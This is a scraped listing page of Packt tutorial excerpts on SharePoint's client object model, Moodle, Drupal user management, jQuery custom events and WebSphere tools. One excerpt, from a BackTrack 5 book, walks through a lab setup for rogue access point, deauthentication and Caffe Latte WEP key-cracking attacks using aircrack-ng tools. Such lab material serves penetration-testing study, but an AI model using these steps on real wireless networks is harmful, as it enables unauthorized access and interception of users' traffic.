ClientContext class implements the IDisposable interface, and hence you need to use the using statement. Without that you have to explicitly dispose the object. If you do not do so, your application will have memory leaks. For more information on disposing objects refer to MSDN at:http://msdn.microsoft.com/en-us/library/ee557362.aspx From the context we were able to obtain access to our site object on which we wanted to create the list. We provided list properties for our new list through the ListCreationInformation instance. Through the instance of ListCreationInformation, we set the values to list properties like name, the templates we want to use, whether the list should be shown in the quick launch bar or not, and so on. We added a new field to the field collection of the list by providing the field schema. Each of the ListItems are created by providing ListItemCreationInformation. The ListItemCreationInformation is similar to ListCreationInformation where you would provide information regarding the list item like whether it belongs to a document library or not, and so on. For more information on ListCreationInformation and ListItemCreationInformation members refer to MSDN at:http://msdn.microsoft.com/en-us/library/ee536774.aspx. All of this information is structured as an XML and batched together to send it to the server. In our case, we created a list and added a new field and about ten list items. Each of these would have an equivalent server-side call, and hence, all these multiple calls were batched together to send it to the server. The request is only sent to the server when we issue an ExecuteQuery or ExecuteQueryAsync method in the client context. The ExecuteQuery method creates an XML request and passes that to Client.svc. The application waits until the batch process on the server is completed and then returns back with the JSON response. Client.svc makes the server Object Model call to execute our request. There's more... By default, ClientContext instance uses windows authentication. It makes use of the windows identity of the person executing the application. Hence, the person running the application should have proper authorization on the site to execute the commands. Exceptions will be thrown if proper permissions are not available for the user executing the application. We will learn about handling exceptions in the next recipe. It also supports Anonymous and FBA (ASP.Net form based authentication) authentication. The following is the code for passing FBA credentials if your site supports it: using (ClientContext clientCtx = new ClientContext("http://intsp1")){clientCtx.AuthenticationMode = ClientAuthenticationMode.FormsAuthentication;FormsAuthenticationLoginInfo fba = new FormsAuthenticationLoginInfo("username", "password");clientCtx.FormsAuthenticationLoginInfo = fba;//Business Logic} Impersonation In order to impersonate you can pass in credential information to the ClientContext as shown in the following code: clientCtx.Credentials = new NetworkCredential("username", "password", "domainname"); Passing credential information this way is supported only in Managed OM.  
Read more
  • 0
  • 0
  • 6028

article-image-backtrack-5-attacking-client
Packt
28 Sep 2011
7 min read
Save for later

BackTrack 5: Attacking the Client

Packt
28 Sep 2011
7 min read
  (For more resources on BackTrack, see here.) Honeypot and Mis-Association attacks Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Also, along with this list, it will display any networks available in its range. A hacker may do either of two things: Silently monitor the probe and bring up a fake access point with the same ESSID the client is searching for. This will cause the client to connect to the hacker machine, thinking it is the legitimate network. He may create fake access points with the same ESSID as neighboring ones to confuse the user to connect to him. Such attacks are very easy to conduct in coffee shops and airports where a user might be looking to connect to a Wi-Fi connection. These attacks are called Honeypot attacks, which happen due to Mis-Association to the hacker's access point thinking it is the legitimate one. In the next exercise, we will do both these attacks in our lab. Time for action – orchestrating a Mis-Association attack Follow these instructions to get started: In the previous labs, we used a client that had connected to the Wireless Lab access point. Let us switch on the client but not the actual Wireless Lab access point. Let us now run airodump-ng mon0 and check the output. You will very soon find the client to be in not associated mode and probing for Wireless Lab and other SSIDs in its stored profile (Vivek as shown): (Move the mouse over the image to enlarge.) To understand what is happening, let's run Wireshark and start sniffing on the mon0 interface. As expected you might see a lot of packets, which are not relevant to our analysis. Apply a Wireshark filter to only display Probe Request packets from the client MAC you are using: In my case, the filter would be wlan.fc.type_subtype == 0x04 && wlan.sa == 60:FB:42:D5:E4:01. You should now see Probe Request packets only from the client for the SSIDs Vivek and Wireless Lab: Let us now start a fake access point for the network Wireless Lab on the hacker machine using the command shown next: Within a minute or so, the client would connect to us automatically. This shows how easy it is to have un-associated clients. Now, we will try the second case, which is creating a fake access point Wireless Lab in the presence of the legitimate one. Let us turn our access point on to ensure that Wireless Lab is available to the client. For this experiment, we have set the access point channel to 3. Let the client connect to the access point. We can verify this from the airodump-ng screen as shown next: Now let us bring up our fake access point with the SSID Wireless Lab: Notice the client is still connected to the legitimate access point Wireless Lab: We will now send broadcast De-Authentication messages to the client on behalf of the legitimate access point to break their connection: Assuming the signal strength of our fake access point Wireless Lab is stronger than the legitimate one to the client, it connects to our fake access point, instead of the legitimate access point: We can verify the same by looking at the airodump-ng output to see the new association of the client with our fake access point: What just happened? We just created a Honeypot using the probed list from the client and also using the same ESSID as that of neighboring access points. In the first case, the client automatically connected to us as it was searching for the network. In the latter case, as we were closer to the client than the real access point, our signal strength was higher, and the client connected to us. Have a go hero – forcing a client to connect to the Honeypot In the preceding exercise, what do we do if the client does not automatically connect to us? We would have to send a De-Authentication packet to break the legitimate client-access point connection and then if our signal strength is higher, the client will connect to our spoofed access point. Try this out by connecting a client to a legitimate access point, and then forcing it to connect to our Honeypot. Caffe Latte attack In the Honeypot attack, we noticed that clients will continuously probe for SSIDs they have connected to previously. If the client had connected to an access point using WEP, operating systems such as Windows, cache and store the WEP key. The next time the client connects to the same access point, the Windows wireless configuration manager automatically uses the stored key. The Caffe Latte attack was invented by me, the author of this book and was demonstrated in Toorcon 9, San Diego, USA. The Caffe Latte attack is a WEP attack which allows a hacker to retrieve the WEP key of the authorized network, using just the client. The attack does not require the client to be anywhere close to the authorized WEP network. It can crack the WEP key using just the isolated client. In the next exercise, we will retreive the WEP key of a network from a client using the Caffe Latte attack. Time for action – conducting the Caffe Latte attack Follow these instructions to get started: Let us first set up our legitimate access point with WEP for the network Wireless Lab with the key ABCDEFABCDEFABCDEF12 in Hex: Let us connect our client to it and ensure that the connection is successful using airodump-ng as shown next: Let us unplug the access point and ensure the client is in the un-associated stage and searching for the WEP network Wireless Lab: Now we use airbase-ng to bring up an access point with Wireless Lab as the SSID with the parameters shown next: As soon as the client connects to this access point, airbase-ng starts the Caffe- Latte attack as shown: We now start airodump-ng to collect the data packets from this access point only, as we did before in the WEP-cracking case: We also start aircrack-ng as in the WEP-cracking exercise we did before to begin the cracking process. The command line would be aircrack-ng filename where filename is the name of the file created by airodump-ng: Once we have enough WEP encrypted packets, aircrack-ng succeeds in cracking the key as shown next: What just happened? We were successful in retrieving the WEP key from just the wireless client without requiring an actual access point to be used or present in the vicinity. This is the power of the Caffe Latte attack. The attack works by bit flipping and replaying ARP packets sent by the wireless client post association with the fake access point created by us. These bit flipped ARP Request packets cause more ARP response packets to be sent by the wireless client. Note that all these packets are encrypted using the WEP key stored on the client. Once we are able to gather a large number of these data packets, aircrack-ng is able to recover the WEP key easily. Have a go hero – practice makes you perfect! Try changing the WEP key and repeat the attack. This is a difficult attack and requires some practice to orchestrate successfully. It would also be a good idea to use Wireshark and examine the traffic on the wireless network.
Read more
  • 0
  • 0
  • 3243
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €14.99/month. Cancel anytime
article-image-introduction-moodle
Packt
28 Sep 2011
5 min read
Save for later

Introduction to Moodle

Packt
28 Sep 2011
5 min read
  (For more resources on Moodle, see here.) The Moodle philosophy Moodle is designed to support a style of learning called Social Constructionism. This style of learning is interactive. The social constructionist philosophy believes that people learn best when they interact with the learning material, construct new material for others, and interact with other students about the material. The difference between a traditional class and a class following the social constructionist philosophy is the difference between a lecture and a discussion. Moodle does not require you to use the social constructionist method for your courses. However, it best supports this method. For example, Moodle allows you to add several kinds of static course material. This is course material that a student reads, but does not interact with: Web pages Links to anything on the Web (including material on your Moodle site) A directory of files A label that displays any text or image However, Moodle also allows you to add interactive course material. This is course material that a student interacts with, by answering questions, entering text, or uploading files: Assignment (uploading files to be reviewed by the teacher) Choice (a single question) Lesson (a conditional, branching activity) Quiz (an online test) Moodle also offers activities where students interact with each other. These are used to create social course material: Chat (live online chat between students) Forum (you can have zero or more online bulletin boards for each course) Glossary (students and/or teachers can contribute terms to site-wide glossaries) Wiki (this is a familiar tool for collaboration to most younger students and many older students) Workshop (this supports the peer review and feedback of assignments that students upload) In addition, some of Moodle's add-on modules add even more types of interaction. For example, one add-on module enables students and teachers to schedule appointments with each other. The Moodle experience Because Moodle encourages interaction and exploration, your students' learning experience will often be non-linear. Moodle can be used to enforce a specific order upon a course, using something called conditional activities. Conditional activities can be arranged in a sequence. Your course can contain a mix of conditional and non-linear activities. In this section, I'll take you on a tour of a Moodle learning site. You will see the student's experience from the time that the student arrives at the site, through entering a course, to working through some material in the course. You will also see some student-to-student interaction, and some functions used by the teacher to manage the course. The Moodle Front Page The Front Page of your site is the first thing that most visitors will see. This section takes you on a tour of the Front Page of my demonstration site. Probably the best Moodle demo sites are http://demo.moodle.net/ and http://school.demo.moodle.net/. Arriving at the site When a visitor arrives at a learning site, the visitor sees the Front Page. You can require the visitor to register and log in before seeing any part of your site, or you can allow an anonymous visitor to see a lot of information about the site on the Front Page, which is what I have done: (Move the mouse over the image to enlarge.) One of the first things that a visitor will notice is the announcement at the top and centre of the page, Moodle 2.0 Book Almost Ready!. Below the announcement are two activities: a quiz, Win a Prize: Test Your Knowledge of E-mail History, and a chat room, Global Chat Room. Selecting either of these activities will require to the visitor to register with the site, as shown in the following screenshot: Anonymous, guest, and registered access Notice the line Some courses may allow guest access at the middle of the page. You can set three levels of access for your site, and for individual courses: Anonymous access allows anyone to see the contents of your site's Front Page. Notice that there is no Anonymous access for courses. Even if a course is open to Guests, the visitor must either manually log in as the user Guest, or you must configure the site to automatically log in a visitor as Guest. Guest access requires the user to login as Guest. This allows you to track usage, by looking at the statistics for the user Guest. However, as everyone is logged in as the user Guest, you can't track individual users. Registered access requires the user to register on your site. You can allow people to register with or without e-mail confirmation, require a special code for enrolment, manually create their accounts yourself, import accounts from another system, or use an outside system (like an LDAP server) for your accounts. The Main menu Returning to the Front Page, notice the Main menu in the upper-left corner. This menu consists of two documents that tell the user what the site is about, and how to use it. In Moodle, icons tell the user what kind of resource will be accessed by a link. In this case, the icon tells the user that the first resource is a PDF (Adobe Acrobat) document, and the second is a web page. Course materials that students observe or read, such as web or text pages, hyperlinks, and multimedia files are called Resources.
Read more
  • 0
  • 0
  • 2496

article-image-drupal-7-social-networking-managing-users-and-profiles
Packt
27 Sep 2011
9 min read
Save for later

Drupal 7 Social Networking: Managing Users and Profiles

Packt
27 Sep 2011
9 min read
  (For more resources on Drupal, see here.) What are we going to do and why? Before we get started, let's take a closer look at what we are going to do in this article and why. At the moment, our users can interact with the website and contribute content, including through their own personal blog. Apart from the blog, there isn't a great deal which differentiates our users; they are simply a username with a blog! One key improvement to make now is to make provisions for customizable user profiles. Our site being a social network with a dinosaur theme, the following would be useful information to have on our users: Details of their pet dinosaurs, including: Name Breed Date of birth Hobbies Their details for other social networking sites; for example, links to their Facebook profile, Twitter account, or LinkedIn page Location of the user (city / area) Their web address (if they have their own website) Some of these can be added to user profiles by adding new fields to profiles, using the built in Field API; however we will also install some additional modules to extend the default offering. Many websites allow users to upload an to associate with their user account, either a photograph or an avatar to represent them. Drupal has provisions for this, but it has some drawbacks which can be fixed using Gravatar. Gravatar is a social avatar service through which users upload their avatar, which is then accessed by other websites that request the avatar using the user's e-mail address. This is convenient for our users, as it saves them having to upload their avatars to our site, and reduces the amount of data stored on our site, as well as the amount of data being transferred to and from our site. Since not all users will want to use a third-party service for their avatars (particularly, users who are not already signed up to Gravatar) we can let them upload their own avatars if they wish, through the Upload module. There are many other social networking sites out there, which don't complete with ours, and are more generalized, as a result we might want to allow our users to promote their profiles for other social networks too. We can download and install the Follow module which will allow users to publicize their profiles for other social networking sites on their profile on our site. Once our users get to know each other more, they may become more interested in each other's posts and topics and may wish to look up a specific user's contribution to the site. The tracker module allows users to track one another's contributions to the site. It is a core module, which just needs to be enabled and set up. Now that we have a better idea of what we are going to do in this , let's get started! Getting set up As this article covers features provided by both core modules and contributed modules (which need to be downloaded first), let's download and enable the modules first, saving us the need for continually downloading and enabling modules throughout the article. The modules which we will require are: Tracker (core module) Gravatar (can be downloaded from: http://drupal.org/project/gravatar) Follow (can be downloaded from: http://drupal.org/project/follow) Field_collection (can be downloaded from:http://drupal.org/project/field_collection) Entity (can be downloaded from:http://drupal.org/project/entity ) Trigger module (core module) These modules can be downloaded and then the contents extracted to the /sites/all/modules folder within our Drupal installation. Once extracted they will then be ready to be enabled within the Modules section of our admin area. Users, roles, and permissions Let's take a detailed look at users, roles, and permissions and how they all fit together. Users, roles, and permissions are all managed from the People section of the administration area: User management Within the People section, users are listed by default on the main screen. These are user accounts which are either created by us, as administrators, or created when a visitor to our site signs up for a user account. From here we can search for particular types of users, create new users, and edit users—including updating their profiles, suspending their account, or delete them permanently from our social network. Once our site starts to gain popularity it will become more difficult for us to navigate through the user list. Thankfully there are search, sort, and filter features available to make this easier for us. Let's start by taking a look at our user list: (Move the mouse over the image to enlarge.) This user list shows, for each user: Their username If their user account is active or blocked (their status) The roles which are associated with their account How long they have been a member of our community When they last accessed our site A link to edit the user's account Users: Viewing, searching, sorting, and filtering Clicking on a username will take us to the profile of that particular user, allowing us to view their profile as normal. Clicking one of the headings in the user list allows us to sort the list from the field we selected: This could be particularly useful to see who our latest members are, or to allow us to see which users are blocked, if we need to reactivate a particular account. We can also filter the user list based on a particular role that is assigned to a user, a particular permission they have (by virtue of their roles), or by their status (if their account is active or blocked). This is managed from the SHOW ONLY USERS WHERE panel: Creating a user Within the People area, there is a link Add user, which will allow us to create a new user account for our site: This takes us to the new user page where we are required to fill out the Username, E-mail address, and Password (twice to confirm) for the new user account we wish to create. We can also select the status of the user (Active or Blocked), any roles we wish to apply to their account, and indicate if we want to automatically e-mail the user to notify them of their new account: Editing a user To edit a user account we simply need to click the edit link displayed next to the user in the user list. This takes us to a page similar to the create user screen, except that it is pre-populated with the users details. It also contains a few other settings related to some default installed modules. As we install new modules, the page may include more options. Inform the user! If you are planning to change a user's username, password, or e-mail address you should notify them of the change, otherwise they may struggle the next time they try to log in! Suspending / blocking a user If we need to block or suspend a user, we can do this from the edit screen by updating their status to Blocked: This would prevent the user from accessing our site. For example, if a user had been posting inappropriate material, even after a number of warnings, we could block their account to prevent them from accessing the site. Why block? Why not just delete? If we were to simply delete a user who was troublesome on the site, they could simply sign up again (unless we went to a separate area and also blocked their e-mail address and username). Of course, the user could still sign up again using a different e-mail address and a different username, but this helps us keep things under control. Canceling and deleting a user account Also within the edit screen is the option to cancel a user's account: On clicking the Cancel account button, we are given a number of options for how we wish to cancel the account: The first and third options will at least keep the context of any discussions or contributions to which the user was involved with. The second option will unpublish their content, so if for example comments or pages are removed which have an impact on the community, we can at least re-enable them. The final option will delete the account and all content associated with it. Finally, we can also select if the user themselves must confirm that they wish to have their account deleted. Particularly useful if this is in response to a request from the user to delete all of their data, they can be given a final chance to change their mind. Bulk user operations For occasions when we need to perform specific operations to a range of user accounts (for example, unblocking a number of users, or adding / removing roles from specific users) we can use the Update options panel, in the user list to do these: From here we simply select the users we want to apply an action to, and then select one of the following options from the UPDATE OPTIONS list: Unblock the selected users Block the selected users Cancel the selected user accounts Add a role to the selected users Remove a role from the selected users Roles Users are grouped into a number of roles, which in turn have permissions assigned to them. By default there are three roles within Drupal: Administrators Anonymous users Authenticated users The anonymous and authenticated roles can be edited but they cannot be renamed or deleted. We can manage user roles by navigating to People | Permissions | Roles: The edit permissions link allows us to edit the permissions associated with a specific role. To create a new role, we simply need to enter the name for the role in the text box provided and click the Add role button.  
Read more
  • 0
  • 0
  • 4258

article-image-learning-jquery
Packt
27 Sep 2011
9 min read
Save for later

Learning jQuery

Packt
27 Sep 2011
9 min read
  (For more resources on jQuery, see here.) Custom events The events that are triggered naturally by the DOM implementations of browsers are crucial to any interactive web application. However, we are not limited to this set of events in our jQuery code. We can freely add our own custom events to the repertoire. Custom events must be triggered manually by our code. In a sense, they are like regular functions that we define, in that we can cause a block of code to be executed when we invoke it from another place in the script. The .bind() call corresponds to a function definition and the .trigger() call to a function invocation. However, event handlers are decoupled from the code that triggers them. This means that we can trigger events at any time, without knowing in advance what will happen when we do. We might cause a single bound event handler to execute, as with a regular function. We also might cause multiple handlers to run or even none at all. In order to illustrate this, we can revise our Ajax loading feature to use a custom event. We will trigger a nextPage event whenever the user requests more photos and bind handlers that watch for this event and perform the work previously done by the .click() handler as follows: $(document).ready(function() { $('#more-photos').click(function() { $(this).trigger('nextPage'); return false; }); }); The .click() handler now does very little work itself. After triggering the custom event, it prevents the default behavior by returning false. The heavy lifting is transferred to the new event handlers for the nextPage event as follows: (function($) { $(document).bind('nextPage', function() { var url = $('#more-photos').attr('href'); if (url) { $.get(url, function(data) { $('#gallery').append(data); }); } }); var pageNum = 1; $(document).bind('nextPage', function() { pageNum++; if (pageNum < 20) { $('#more-photos') .attr('href', 'pages/' + pageNum + '.html'); } else { $('#more-photos').remove(); } }); })(jQuery); The largest difference is that we have split what was once a single function into two. This is simply to illustrate that a single event trigger can cause multiple bound handlers to fire. The other point to note is that we are illustrating another application of event bubbling here. Our nextPage handlers could be bound to the link that triggers the event, but we would need to wait to do this until the DOM was ready. Instead, we are binding the handlers to the document itself, which is available immediately, so we can do the binding outside of $(document).ready(). The event bubbles up and, so long as another handler does not stop the event propagation, our handlers will be fired. Infinite scrolling Just as multiple event handlers can react to the same triggered event, the same event can be triggered in multiple ways. We can demonstrate this by adding an infinite scrolling feature to our page. This popular technique lets the user's scroll bar manage the loading of content, fetching additional content whenever the user reaches the end of what has been loaded thus far. We will begin with a simple implementation, and then improve it in successive examples. The basic idea is to observe the scroll event, measure the current scroll bar position when scrolling occurs, and load the new content if needed, as follows: (function($) { var $window = $(window); function checkScrollPosition() { var distance = $window.scrollTop() + $window.height(); if ($('#container').height() <= distance) { $(document).trigger('nextPage'); } } $(document).ready(function() { $window.scroll(checkScrollPosition).scroll(); }); })(jQuery); The new checkScrollPosition() function is set as a handler for the window's scroll event. This function computes the distance from the top of the document to the bottom of the window, and then compares this distance to the total height of the main container in the document. As soon as these reach equality, we need to fill the page with additional photos, so we trigger the nextPage event. As soon as we bind the scroll handler, we immediately trigger it with a call to .scroll(). This kick-starts the process, so that if the page is not initially filled with photos, an Ajax request is made right away. Custom event parameters When we define functions, we can set up any number of parameters to be filled with argument values when we actually call the function. Similarly, when triggering a custom event, we may want to pass along additional information to any registered event handlers. We can accomplish this by using custom event parameters. The first parameter defined for any event handler, as we have seen, is the DOM event object as enhanced and extended by jQuery. Any additional parameters we define are available for our discretionary use. To see this action, we will add a new option to the nextPage event allowing us to scroll the page down to display the newly added content as follows: (function($) { $(document).bind('nextPage', function(event, scrollToVisible) { var url = $('#more-photos').attr('href'); if (url) { $.get(url, function(data) { var $data = $(data).appendTo('#gallery'); if (scrollToVisible) { var newTop = $data.offset().top; $(window).scrollTop(newTop); } checkScrollPosition(); }); } } ); }); We have now added a scrollToVisible parameter to the event callback. The value of this parameter determines whether we perform the new functionality, which entails measuring the position of the new content and scrolling to it. Measurement is easy using the .offset() method, which returns the top and left coordinates of the new content. In order to move down the page, we call the .scrollTop() method. Now we need to pass an argument into the new parameter. All that is required is providing an extra value when invoking the event using .trigger(). When newPage is triggered through scrolling, we don't want the new behavior to occur, as the user is already manipulating the scroll position directly. When the More Photos link is clicked, on the other hand, we want the newly added photos to be displayed on the screen, so we will pass a value of true to the handler as follows: $(document).ready(function() { $('#more-photos').click(function() { $(this).trigger('nextPage', [true]); return false; }); $window.scroll(checkScrollPosition).scroll(); }); In the call to .trigger(), we are now providing an array of values to pass to event handlers. In this case, the value of true will be given to the scrollToVisible parameter of the event handler. Note that custom event parameters are optional on both sides of the transaction. We have two calls to .trigger() in our code, only one of which provides argument values; when the other is called, this does not result in an error, but rather the value of null is passed to each parameter. Similarly, the lack of a scrollToVisible parameter in one of our .bind('nextPage') calls is not an error; if a parameter does not exist when an argument is passed, that argument is simply ignored. Throttling events A major issue with the infinite scrolling feature as we have implemented it is its performance impact. While our code is brief, the checkScrollPosition() function does need to do some work to measure the dimensions of the page and window. This effort can accumulate rapidly, because in some browsers the scroll event is triggered repeatedly during the scrolling of the window. The result of this combination could be choppy or sluggish performance. Several native events have the potential for frequent triggering. Common culprits include scroll, resize, and mousemove. To account for this, we need to limit our expensive calculations, so that they only occur after some of the event instances, rather than each one. This technique is known as event throttling. $(document).ready(function() { var timer = 0; $window.scroll(function() { if (!timer) { timer = setTimeout(function() { checkScrollPosition(); timer = 0; }, 250); } }).scroll(); }); Rather than setting checkScrollPosition() directly as the scroll event handler, we are using the JavaScript setTimeout function to defer the call by 250 milliseconds. More importantly, we are checking for a currently running timer first before performing any work. As checking the value of a simple variable is extremely fast, most of the calls to our event handler will return almost immediately. The checkScrollPosition() call will only happen when a timer completes, which will at most be every 250 milliseconds. We can easily adjust the setTimeout() value to a comfortable number that strikes a reasonable compromise between instant feedback and low performance impact. Our script is now a good web citizen. Other ways to perform throttling The throttling technique we have implemented is efficient and simple, but it is not the only solution. Depending on the performance characteristics of the action being throttled and typical interaction with the page, we may for instance want to institute a single timer for the page rather than create one when an event begins: $(document).ready(function() { var scrolled = false; $window.scroll(function() { scrolled = true; }); setInterval(function() { if (scrolled) { checkScrollPosition(); scrolled = false; } }, 250); checkScrollPosition(); }); Unlike our previous throttling code, this polling solution uses a single setInterval() call to begin checking the state of the scrolled variable every 250 milliseconds. Any time a scroll event occurs, scrolled is set to true, ensuring that the next time the interval passes, checkScrollPosition() will be called. A third solution for limiting the amount of processing performed during frequently repeated events is debouncing. This technique, named after the post-processing required handling repeated signals sent by electrical switches, ensures that only a single, final event is acted upon even when many have occurred. Deferred objects In jQuery 1.5, a concept known as a deferred object was introduced to the library. A deferred object encapsulates an operation that takes some time to complete. These objects allow us to easily handle situations in which we want to act when a process completes, but we don't necessarily know how long the process will take or even if it will be successful. A new deferred object can be created at any time by calling the $.Deferred() constructor. Once we have such an object, we can perform long-lasting operations and then call the .resolve() or .reject() methods on the object to indicate the operation was successful or unsuccessful. It is somewhat unusual to do this manually, however. Typically, rather than creating our own deferred objects by hand, jQuery or its plugins will create the object and take care of resolving or rejecting it. We just need to learn how to use the object that is created. Creating deferred objects is a very advanced topic. Rather than detailing how the $.Deferred() constructor operates, we will focus here on how jQuery effects take advantage of deferred objects.  
Read more
  • 0
  • 0
  • 4074

article-image-ibm-websphere-application-server-administration-tools
Packt
23 Sep 2011
9 min read
Save for later

IBM WebSphere Application Server: Administration Tools

Packt
23 Sep 2011
9 min read
  (For more resources on IBM, see here.) Dumping namespaces To diagnose a problem, you might need to collect WAS JNDI information. WebSphere Application Server provides a utility that dumps the JNDI namespace. The dumpNamespace.sh script dumps information about the WAS namespace and is very useful when debugging applications when JNDI errors are seen in WAS logs. You can use this utility to dump the namespace to see the JNDI tree that the WAS name server (WAS JNDI lookup service provider) is providing for applications. This tool is very useful in JNDI problem determination, for example, when debugging incorrect JNDI resource mappings in the case where an application resource is not mapped correctly to a WAS-configured resource or the application is using direct JNDI lookups when really it should be using indirect lookups. For this tool to work, WAS must be running when this utility is run. To run the utility, use the following syntax: ./dumpNameSpace.sh -<command_option> There are many options for this tool and the following table lists the command-line options available by typing the command <was_root>/dumpsnameSpace.sh -help: Command option Description -host <host> Bootstrap host, that is, the WebSphere host whose namespace you want to dump. Defaults to localhost. -port <port> Bootstrap port. Defaults to 2809. -user <name> Username for authentication if security is enabled on the server. Acts the same way as the -username keyword. -username <name> Username for authentication if security is enabled on the server. Acts the same way as the -user keyword. -password <password> Password for authentication, if security is enabled in the server. -factory <factory> The initial context factory to be used to get the JNDI initial context. Defaults to com.ibm.websphere.naming. WsnInitialContextFactory and normally does not need to be changed. -root [ cell | server | node | host | legacy | tree | default ] Scope of the namespace to dump. For WS 5.0 or later: cell: DumpNameSpace default. Dump the tree starting at the cell root context. server: Dump the tree starting at the server root context. node: Dump the tree starting at the node root context. (Synonymous with host) For WS 4.0 or later: legacy: DumpNameSpace default. Dump the tree starting at the legacy root context. host: Dump the tree starting at the bootstrap host root context. (Synonymous with node) tree: Dump the tree starting at the tree root context. For all WebSphere and other name servers: default: Dump the tree starting at the initial context, which JNDI returns by default for that server type. This is the only -root choice that is compatible with WebSphere servers prior to 4.0 and with non-WebSphere name servers. The WebSphere initial JNDI context factory (default) obtains the desired root by specifying a key specific to the server type when requesting an initial CosNaming NamingContext reference. The default roots and the corresponding keys used for the various server types are listed as follows: WebSphere 5.0: Server root context. This is the initial reference registered under the key of NameServiceServerRoot on the server. WebSphere 4.0: Legacy root context. This context is bound under the name domain/legacyRoot, in the initial context registered on the server, under the key NameService. WebSphere 3.5: Initial reference registered under the key of NameService, on the server. Non-WebSphere: Initial reference registered under the key of NameService, on the server. -url <url> The value for the java.naming.provider.url property used to get the initial JNDI context. This option can be used in place of the -host, -port, and -root options. If the -url option is specified, the -host,-port, and -root options are ignored. -startAt <some/subcontext/ in/the/tree> The path from the requested root context to the top-level context, where the dump should begin. Recursively dumps (displays a tree-like structure) the sub-contexts of each namespace context. Defaults to empty string, that is, root context requested with the -root option. -format [ jndi | ins ] jndi: Display name components as atomic strings. ins: Display name components parsed per INS rules (id.kind) The default format is jndi. -report [ short | long ] short: Dumps the binding name and bound object type, which is essentially what JNDI Context. list() provides. long: Dumps the binding name, bound object type, local object type, and string representation of the local object, that is, Interoperable Object References (IORs) string values, and so on, are printed). The default report option is short. -traceString <some.package. to.trace.*=all> Trace string of the same format used with servers, with output going to the DumpNameSpaceTrace.out file. Example name space dump To see the result of using the namespace tool, navigate to the <was_root>/bin directory on your Linux server and type the following command: For Linux: ./dumpNameSpace.sh -root cell -report short -username wasadmin -password wasadmin >> /tmp/jnditree.txt For Windows: ./dumpNameSpace.bat -root cell -report short -username wasadmin -password wasadmin > c:tempjnditree.txt The following screenshot shows a few segments of the contents of an example jnditree.txt file which would contain the output of the previous command. EAR expander Sometimes during application debugging or automated application deployment, you may need to enquire about the contents of an Enterprise Archive (EAR) file. An EAR file is made up of one or more WAR files (web applications), one or more Enterprise JavaBeans (EJBs), and there can be shared JAR files as well. Also, within each WAR file, there may be JAR files as well. The EARExpander.sh utility allows all artifacts to be fully decompressed much as expanding a TAR file. Usage syntax: EARExpander -ear (name of the input EAR file for the expand operation or name of the output EAR file for the collapse operation) -operationDir (directory to which the EAR file is expanded or directory from which the EAR file is collapsed) -operation (expand | collapse) [-expansionFlags (all | war)] [-verbose] To demonstrate the utility, we will expand the HRListerEAR.ear file. Ensure that you have uploaded the HRListerEAR.ear file to a new folder called /tmp/EARExpander on your Linux server or an appropriate alternative location and run the following command: For Linux: <was_root>/bin/EARExpander.sh -ear /tmp/HRListerEAR.ear -operationDir /tmp/expanded -operation expand -expansionFlags all -verbose For Windows: <was_root>binEARExpander.bat -ear c:tempHRListerEAR.ear -operationDir c:tempexpanded -operation expand -expansionFlags all -verbose The result will be an expanded on-disk structure of the contents of the entire EAR file, as shown in the following screenshot: An example of everyday use could be that EARExpander.sh is used as part of a deployment script where an EAR file is expanded and hardcoded properties files are searched and replaced. The EAR is then re-packaged using the EARExpander -operation collapse option to recreate the EAR file once the find-and-replace routine has completed. An example of how to collapse an expanded EAR file is as follows: For Linux: <was_root>/bin/EARExpander.sh -ear /tmp/collapsed/HRListerEAR.ear -operationDir /tmp/expanded -operation collapse -expansionFlags all -verbose For Windows: <was_root>binEARExpander.bat -ear c:tempcollapsedHRListerEAR. ear -operationDir c:tempexpanded -operation collapse -expansionFlags all -verbose In the previous command line examples, the folder called EARExpander contains an expanded HRListerEAR.ear file, which was created when we used the -expand command example previously. To collapse the files back into an EAR file, use the -collapse option, as shown previously in the command line example. Collapsing the EAR folders results in a file called HRListerEAR.ear, which is created by collapsing the expanded folder contents back into a single EAR file. IBM Support Assistant IBM Support Assistant can help you locate technical documents and fixes, and discover the latest and most useful support resources available. IBM Support Assistant can be customized for over 350 products and over 20 tools, not just WebSphere Application Server. The following is a list of the current features in IBM Support Assistant: Search Information Search and filter results from a number of different websites and IBM Information Centers with just one click. Product Information Provides you with a page full of related resources specific to the IBM software you are looking to support. It also lists the latest support news and information, such as the latest fixes, APARs, Technotes, and other support data for your IBM product. Find product education and training materials Using this feature, you can search for online educational materials on how to use your IBM product. Media Viewer The media viewer allows you search and find free education and training materials available on the IBM Education Assistant sites. You can also watch Flash-based videos, read documentation, view slide presentations, or download for offline access. Automate data collection and analysis Support Assistant can help you gather the relevant diagnostic information automatically so you do not have to manually locate the resources that can explain the cause of the issue. With its automated data collection capabilities, ISA allows you to specify the troublesome symptom and have the relevant information automatically gathered in an archive. You can then look through this data, analyze it with the IBM Support Assistant tool, and even forward data to IBM support. Generate IBM Support Assistant Lite packages for any product addon that has data collection scripts. You can then export a lightweight Java application that can easily be transferred to remote systems for remote data connection. Analysis and troubleshooting tools for IBM products ISA contains tools that enable you to troubleshoot system problems. These include: analyzing JVM core dumps and garbage collector data, analyzing system ports, and also getting remote assistance from IBM support. Guided Troubleshooter This feature provides a step-by-step troubleshooting wizard that can be used to help you look for logs, suggest tools, or recommend steps on fixing the problems you are experiencing. Remote Agent technology Remote agent capabilities through the feature pack provide the ability to perform data collection and file transfer through the workbench from remote systems. Note that the Remote agents must be installed and configured with appropriate 'root-level' access. ISA is a very detailed tool and we cannot cover every feature in this article. However, for a demonstration, we will install ISA and then update ISA with an add-on called the Log Analyzer. We will use the Log Analyzer to analyze a WAS SystemOut.log file. Downloading the ISA workbench To download ISA you will require your IBM user ID. The download can be found at the following URL: http://www-01.ibm.com/software/support/isa/download.html It is possible to download both Windows and Linux versions.
Read more
  • 0
  • 0
  • 4235
article-image-backtrack-5-advanced-wlan-attacks
Packt
13 Sep 2011
4 min read
Save for later

BackTrack 5: Advanced WLAN Attacks

Packt
13 Sep 2011
4 min read
